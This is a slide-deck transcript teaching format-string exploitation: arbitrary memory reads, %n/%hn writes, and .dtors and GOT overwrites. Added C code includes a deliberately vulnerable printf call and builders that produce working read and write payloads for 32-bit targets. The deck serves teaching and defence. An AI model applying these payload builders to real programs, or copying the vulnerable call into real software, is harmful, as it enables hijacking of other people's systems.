
Format strings




  1. Format strings Reporter : Nickle Nickle@NSC

  2. Agenda • Introduction • Reading from arbitrary memory address • Write to arbitrary memory address • Direct parameter access • Detours with dtors • Overwriting the global offset table • Conclusion

  3. Introduction • The printf() family takes a format string followed by a variable number of arguments, one per conversion directive • Directives • %d - signed decimal • %u - unsigned decimal • %x - hexadecimal • %s - string; the argument is the start address of a NUL-terminated string • %n - outputs nothing, but stores the number of bytes written so far into the int its argument points to

  4. Introduction (cont.) • printf("blah %d %d %d %d", a, b, c, d); • On 32-bit x86 the caller pushes the arguments right to left, so from low to high address the stack holds the address of the format string, then a, b, c, d, each at a fixed offset from EBP • What if d is missing? printf cannot know how many arguments were passed: the fourth %d still reads whatever word sits at the fourth parameter position • The format-string vulnerability: printf("%s", string) is safe, printf(string) is not, because the content of string now decides which directives run and which stack words they consume

  5. Reading from arbitrary memory address • The format string is processed one directive at a time, each directive consuming the next word on the stack • %s takes that word as a pointer and prints the bytes it points to until a NULL byte is reached • If we control the word that %s reads, we can dump any readable memory in the process • Demo code (fmt_vuln.c)

  6. Reading from arbitrary memory address • The input buffer: [target address][%x. %x. %x. ...][%s] • The leading %x directives consume the stack words between printf's first argument and the buffer (the offset); %s then consumes the word we placed at the beginning of the buffer, the target address, and prints what it points to

  7. Reading from arbitrary memory address • The memory layout, from low to high address: printf's frame (SFP, RET), the address of the format string and the words above it, ..., then the vulnerable function's buffer, its local variables, SFP and RET • The buffer lies above printf's arguments, so enough %x directives walk the argument pointer up into the buffer we control
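An added example for slides 4 to 7, not the deck's own fmt_vuln.c (which the transcript does not reproduce): the vulnerable and hardened calls side by side, a directive counter that can sit in front of a logging call, and a builder for the read payload of slide 6. The target address, the offset of 4 and the 32-bit little-endian layout are assumptions chosen for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern from slide 4: the untrusted string *is* the format,
 * so every '%' directive inside it runs and pulls words off the stack.
 * gcc's -Werror=format-security (a default on several distributions)
 * rejects printf(user) outright, so the deliberately bad call goes through
 * a plain function pointer here only to keep the example compiling. */
void echo_vulnerable(const char *user)
{
    int (*fmt_fn)(const char *, ...) = printf;
    fmt_fn(user);                 /* format-string bug, kept on purpose */
    putchar('\n');
}

/* Hardened form: a literal format, the untrusted data as an argument. */
void echo_safe(const char *user)
{
    printf("%s\n", user);
}

/* Counts conversion directives in a string ('%' not followed by another
 * '%'). Usable as a pre-check on data headed for a format function, and
 * as a detection rule for inputs such as "%x.%x.%x.%s". */
int count_directives(const char *s)
{
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') p++;     /* "%%" is a literal percent sign */
        else n++;
    }
    return n;
}

/* Builds the read payload of slide 6 for a 32-bit little-endian target:
 * the raw target address first, then `offset - 1` "%x." directives that
 * consume the words between printf's first argument and the buffer, then
 * "%s", which dereferences the address we supplied. `offset` is the
 * 1-based argument position of the buffer's first word; in practice it is
 * found by feeding "AAAA%x.%x.%x..." and counting until 41414141 shows up.
 * Returns the payload length, or 0 if `cap` is too small. */
size_t build_read_payload(char *out, size_t cap, uint32_t addr, int offset)
{
    size_t pos = 0;
    if (offset < 1 || cap < 4 + 3 * (size_t)(offset - 1) + 3) return 0;
    for (int i = 0; i < 4; i++) out[pos++] = (char)(addr >> (8 * i));
    for (int i = 1; i < offset; i++) pos += sprintf(out + pos, "%%x.");
    pos += sprintf(out + pos, "%%s");
    return pos;
}
```

With the constructed address 0x08049570 and offset 4 the builder emits the four bytes 70 95 04 08 followed by "%x.%x.%x.%s", which is exactly the layout drawn on slide 6; count_directives() reports 4 directives for that tail and 0 for ordinary text.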

  8. Write to arbitrary memory address • %n stores the number of bytes output so far into the int that its argument points to • printf("blablabla %n", &variable); stores 10 in variable • If we control the word that %n consumes, we choose where that count is written • Demo code (fmt_vuln)

  9. Write to arbitrary memory address • The input buffer: [target address][%x. %x. %x.][%n] • The %x chain consumes the offset words so that %n's argument is the target address at the start of the buffer • Control the written value with the field width of the last %x (%βx): padding to β characters raises the byte count, and that count is what %n stores ... [target address][%x. %x. %βx.][%n]

  10. Write to arbitrary memory address • Goal: write a chosen 4-byte value, typically an address, into the target location

  11. Write to arbitrary memory address • Write once, one byte per %n: the buffer holds the four target addresses, each separated by 4 bytes of junk, because every %x consumes one word and every %n consumes the next • [08049570][4 bytes][08049571][4 bytes][08049572][4 bytes][08049573] followed by %x. ... %βx. %n. %βx. %n. %βx. %n. %βx. %n • Each %n stores the full 4-byte count, but only its low byte matters at the byte being targeted; the following write at address+1 overwrites the byte above it

  12. Write to arbitrary memory address • How to calculate β? • E.g. the value to write is 0xddccbbaa • Run the format once with a default-width %x: X is the count the first %n stores, Y is the width that %x printed • Z = X - Y is the count everything else contributes • β1 = 0xaa - Z • β2 = 0xbb - 0xaa • β3 = 0xcc - 0xbb • β4 = 0xdd - 0xcc • All arithmetic is modulo 256: the count only grows, so when a byte is smaller than the previous one add 0x100, and subtract any literal separator bytes that sit between two %n ... [target addresses] %x. %β1x. %n. %β2x. %n. %β3x. %n. %β4x. %n

  13. Write to arbitrary memory address • Simpler way to calculate: two 16-bit writes with %hn (short) instead of four byte writes • Fmtbuilder - http://packetstormsecurity.org/papers/unix/fmtbuild.htm • Formula for 0xbfbff26c (HOB => 0xbfbf, LOB => 0xf26c); the buffer starts with [addr+2][addr], 8 bytes, which is why 8 is subtracted from the first half • HOB < LOB • [addr+2][addr]%.[HOB-8]x%[offset]$hn%.[LOB-HOB]x%[offset+1]$hn • HOB > LOB • [addr+2][addr]%.[LOB-8]x%[offset+1]$hn%.[HOB-LOB]x%[offset]$hn • The smaller half is written first because the count only grows; on little-endian x86 the high half lives at addr+2, so argument [offset] points there and [offset+1] points at addr

  14. Direct parameter access • Format parameter %N$x - use the Nth argument directly, regardless of what earlier directives consumed • The chain [target addresses] %x. ... %βx. %n %βx. %n %βx. %n %βx. %n becomes [target addresses] %θ$βx. %θ$n %θ$βx. %θ$n %θ$βx. %θ$n %θ$βx. %θ$n, where θ is the argument index of each address word • No junk words and no padding %x chain are needed to reach the offset
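An added example covering slides 9 to 14 (not code from the deck or from Fmtbuilder): a builder that emits either the four byte-granular %n writes of slides 11 and 12 or the two %hn writes of slide 13, always with the direct parameter access of slide 14, plus a constructed model of a 32-bit little-endian target that interprets just enough of the format to confirm the value lands where intended. The stack layout, the argument offset and the address 0x08049570 are assumptions; the model is not printf, it only mirrors how %x pads and how %n/%hn store the running count.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define WORDS 32
#define MEM   16

/* Constructed 32-bit little-endian target: `stack` holds the words the
 * directives consume, `mem` models addresses base..base+MEM-1, and `count`
 * is the output length that %n/%hn would store. */
struct sim {
    uint32_t stack[WORDS];
    uint8_t  mem[MEM];
    uint32_t base;
    unsigned count;
};

static void put_le(uint8_t *p, uint32_t v, int n)
{
    for (int i = 0; i < n; i++) p[i] = (uint8_t)(v >> (8 * i));
}

/* Padding width that makes (count + width) % mod == want. Kept >= 8 so a
 * %x of a 32-bit word prints exactly `width` characters; the modulo covers
 * the case a plain subtraction misses, a byte smaller than the last one. */
static unsigned width_for(unsigned count, unsigned want, unsigned mod)
{
    unsigned w = (want - count) % mod;   /* unsigned wraparound is exact here */
    return w < 8 ? w + mod : w;
}

/* Payload that stores `value` at `addr` using direct parameter access;
 * `offset` is the 1-based argument index of the payload's first word.
 * hn == 0: four %n writes at addr..addr+3 in address order (slide 11).
 * hn == 1: two %hn writes of the 16-bit halves, smaller half first
 * (slide 13). Returns the length; the leading address bytes are raw. */
size_t build_write(char *out, uint32_t addr, uint32_t value, int offset, int hn)
{
    int unit = hn ? 2 : 1, n = 4 / unit, order[4] = { 0, 1, 2, 3 };
    unsigned mask = hn ? 0xffffu : 0xffu, mod = mask + 1, chunk[4];
    for (int i = 0; i < n; i++) chunk[i] = (value >> (8 * unit * i)) & mask;
    if (hn && chunk[1] < chunk[0]) { order[0] = 1; order[1] = 0; }
    size_t pos = 0;
    for (int i = 0; i < n; i++, pos += 4)
        put_le((uint8_t *)out + pos, addr + unit * order[i], 4);
    unsigned count = (unsigned)pos;              /* the addresses are output too */
    for (int i = 0; i < n; i++) {
        unsigned w = width_for(count, chunk[order[i]], mod);
        count += w;
        pos += sprintf(out + pos, "%%%d$%ux%%%d$%sn", offset, w, offset + i,
                       hn ? "h" : "");
    }
    return pos;
}

/* Just enough of printf to run the payload: literal bytes, %[N$][.][W]x and
 * %[N$][h]n. The payload is first copied onto the simulated stack at
 * argument index `offset`, where the real buffer would sit. */
unsigned run(struct sim *s, const char *fmt, size_t len, int offset)
{
    const uint8_t *u = (const uint8_t *)fmt;
    for (size_t i = 0; i + 4 <= len && offset - 1 + (int)(i / 4) < WORDS; i += 4)
        s->stack[offset - 1 + i / 4] =
            u[i] | u[i + 1] << 8 | u[i + 2] << 16 | (uint32_t)u[i + 3] << 24;
    int sp = 0;
    for (size_t i = 0; i < len; i++) {
        if (fmt[i] != '%' || fmt[++i] == '%') { s->count++; continue; }
        unsigned num = 0;
        int arg = -1, half = 0;
        for (int pass = 0; pass < 2; pass++) {       /* [N$], then [.][W] */
            if (fmt[i] == '.') i++;
            while (fmt[i] >= '0' && fmt[i] <= '9') num = num * 10 + (fmt[i++] - '0');
            if (fmt[i] != '$') break;
            arg = (int)num - 1; num = 0; i++;
        }
        if (fmt[i] == 'h') { half = 1; i++; }
        int idx = arg >= 0 ? arg : sp++;
        uint32_t word = idx < WORDS ? s->stack[idx] : 0;
        if (fmt[i] == 'x') {
            unsigned digits = 1;
            for (uint32_t v = word; v >>= 4; ) digits++;
            s->count += num > digits ? num : digits;
        } else if (fmt[i] == 'n') {
            uint32_t off = word - s->base;
            if (off + (half ? 2 : 4) <= MEM) put_le(&s->mem[off], s->count, half ? 2 : 4);
        }
    }
    return s->count;
}

/* Build the payload, run it, and report whether `value` ended up at `addr`. */
int write_works(uint32_t addr, uint32_t value, int offset, int hn)
{
    struct sim s = { .base = addr };
    char payload[256];
    for (int i = 0; i < WORDS; i++) s.stack[i] = 0xdeadbeef;   /* other frames */
    size_t len = build_write(payload, addr, value, offset, hn);
    run(&s, payload, len, offset);
    return (s.mem[0] | s.mem[1] << 8 | s.mem[2] << 16 | (uint32_t)s.mem[3] << 24) == value;
}
```

For the slide 13 numbers, build_write(out, 0x08049570, 0xbfbff26c, 4, 1) emits the raw words [0x08049572][0x08049570] followed by "%4$49079x%4$hn%4$12973x%5$hn": 49079 is HOB-8 and 12973 is LOB-HOB, as in the Fmtbuilder formula, and the run confirms 0xbfbff26c at the target. The byte-wise mode handles a value such as 0x0804a0b0, where 0x04 and 0x08 are smaller than the bytes before them, by letting the count wrap past 256.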

  15. Detours with .dtors • .ctors and .dtors hold the addresses of constructor and destructor functions, run before main() and after it returns • The .dtors section is writable • .dtors is present in every binary built with the GNU C compiler of that era, so an arbitrary write can replace a destructor entry with the address of our code, which then runs at exit (current toolchains use .fini_array instead, and RELRO can make it read-only) • Demo code

  16. Overwriting the global offset table • The procedure linkage table (PLT) consists of jump instructions through which calls to shared-library functions go • The PLT is read-only • The jumps do not target the functions directly: they jump through pointers stored in another special section, the global offset table (GOT) • The GOT is writable, so replacing a function's GOT entry (one for a libc call made after the vulnerable printf) redirects that call to our code • Caveat: with full RELRO (-z relro -z now) the GOT is mapped read-only after loading • Demo code

  17. Conclusion • Format functions must be used carefully: the format string must never come from untrusted input • With a controlled format string you can read from and write to arbitrary memory addresses

  18. Reference • Jon Erickson, Hacking: The Art of Exploitation • Kudo, Format String Vulnerability
